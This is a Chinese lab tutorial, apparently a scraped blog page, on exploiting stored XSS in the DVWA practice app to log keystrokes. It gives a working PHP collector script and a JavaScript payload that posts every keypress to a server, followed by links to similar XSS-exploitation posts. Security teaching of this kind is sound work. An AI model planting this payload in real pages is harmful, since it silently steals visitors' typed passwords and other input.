XSS漏洞利用——键盘记录
实验环境:DVWA
实验原理:网页被植入xss脚本,普通用户访问此网页时,该用户在当前页面上所有的键盘按键都会被记录下来,并且发送到远端服务器
实验步骤:
一、在服务器创建一个keylog.php文件获取键盘记录,并将记录写入key.txt中。
php代码如下:
<?php
$file=fopen("key.txt","a");
if(isset($_REQUEST['key'])){$key=$_REQUEST['key'];fputs($file,$key);
}
?>
二、编写js脚本
<script>window.onkeydown=function(ev){xhr =new XMLHttpRequest();xhr.open('POST','http://localhost/xss/keylog/keylog.php',true);xhr.setRequestHeader('Content-type','application/x-www-form-urlencoded');xhr.send('key='+String.fromCharCode(ev.keyCode)); }
</script>
三、打开低级别DVWA,选择储存xss模块,将js脚本写入留言框,执行代码
四、可看到当在输入框输入内容时,key.txt已经将键盘记录下来了
XSS漏洞利用——键盘记录相关推荐
- 漏洞复现篇——利用XSS漏洞实现键盘记录
实验环境: PHPstudy 火狐浏览器.IE DVWA靶场 实验准备: 在www目录下创建一个名为keylog.php的文件,代码如下: <?php $file = fopen("k ...
- 利用XSS漏洞实现键盘记录器
利用XSS漏洞实现键盘记录器 本实验以反射性的XSS漏洞为例 实验环境:dvwa靶机(ip:192.168.135.140) kali linux(ip:192.168.135.138) 1.首先开启 ...
- xss漏洞利用方式总结
目录 搭建XSS平台 窃取cookie 抓取屏幕截图 重定向 植入广告 恶意链接 获取键盘记录 网页钓鱼 网页挂马 搭建XSS平台 首先,我们需要一个XSS平台,自己搭建一个还是使用在线的都可以,本人 ...
- kali安装keylogger_小白日记48:kali渗透测试之Web渗透-XSS(二)-漏洞利用-键盘记录器,xsser...
XSS 原则上:只要XSS漏洞存在,可以编写任何功能的js脚本 [反射型漏洞利用] 键盘记录器:被记录下的数据会发送到攻击者指定的URL地址上 服务器:kali 客户端 启动apache2服务:ser ...
- XSS漏洞利用---PHPMyWind 任意密码重置漏洞
[漏洞详情] 1.PHPMyWind是一套基于PHP和MySQL并符合W3C标准的企业网站建设解决方案,拥有着较大的用户群体(根据PHPMyWind官网介绍,已下载超15万次),受影响的版本是5.3- ...
- 【XSS漏洞-06】XSS漏洞利用案例(浏览器劫持、会话劫持、GetShell)—基于神器beEF
目录 1 案例简介 1.1 案例目的 1.2 案例环境 2 案例一:浏览器劫持 2.1 概述 2.2 案例步骤 3 案例二:会话劫持 3.1 概述 3.2 案例步骤 4 案例三:GetShell 4. ...
- 【XSS漏洞07】基于神器beEF的XSS漏洞利用实验(浏览器劫持、会话劫持、GetShell)
目录 1 实验简介 1.1 实验目的 1.2 实验环境 2 实验一:浏览器劫持 2.1 概述 2.2 实验步骤 3 实验二:会话劫持 3.1 概述 3.2 实验步骤 4 实验三:GetShell 4. ...
- XSS漏洞利用之cookie获取
目录 环境搭建 盗取cookie httponly 刚学习xss的时候我们都知道只要能弹窗就肯定存在xss漏洞,也知道xss是可以盗取cookie的,但是至于怎么盗取cookie其实很多同学可能还不是 ...
- Dreammail V4.6.9.2 XSS漏洞利用
转载请注明:@小五义http://www.cnblogs.com/xiaowuyi 针对版本: DreamMail 4.6.9.2 测试环境:windows xp sp3 python版本:2.6 测 ...
最新文章
- 2016-04-28
- mysql事务怎么加排他锁_八种方法实现CSS页面底部固定 - SegmentFault 思否
- linux相等路径,关于linux:如何检查Bash中两条路径是否相等?
- python操作string类型的key的代码
- 物联网应用:蓝牙模块在智能门锁中的应用
- mysql操作json优点和缺点_MySQL与JSON-为什么?
- Android浮窗权限研究(转载)
- 去掉超链接的颜色_Word中怎么快速批量删除去掉网站超链接技巧
- 宠物兽医体层摄影术行业调研报告 - 市场现状分析与发展前景预测(2021-2027年)
- 学习 SpringCloud 五大组件后的总结 一
- 第二章节 ASP.NET 验证控件(一)
- ps图像放大后变清晰和文字模糊变清晰
- 三分钟看懂什么是运维
- 微软Excel 2007 框里打钩/打钩的方框选择
- 高通modem启动过程_高通8953启动流程【转】
- 阿里云杨国彦:云上护航,陪伴成长
- 【转】MIT牛人解说数学体系
- 江西专升本考试作弊事件,为什么最近考试作弊事件频发?
- 国产OGRE商业游戏
- 【C++FunCode】基于Funcode使用C++语言编写小游戏(小鲨鱼历险记)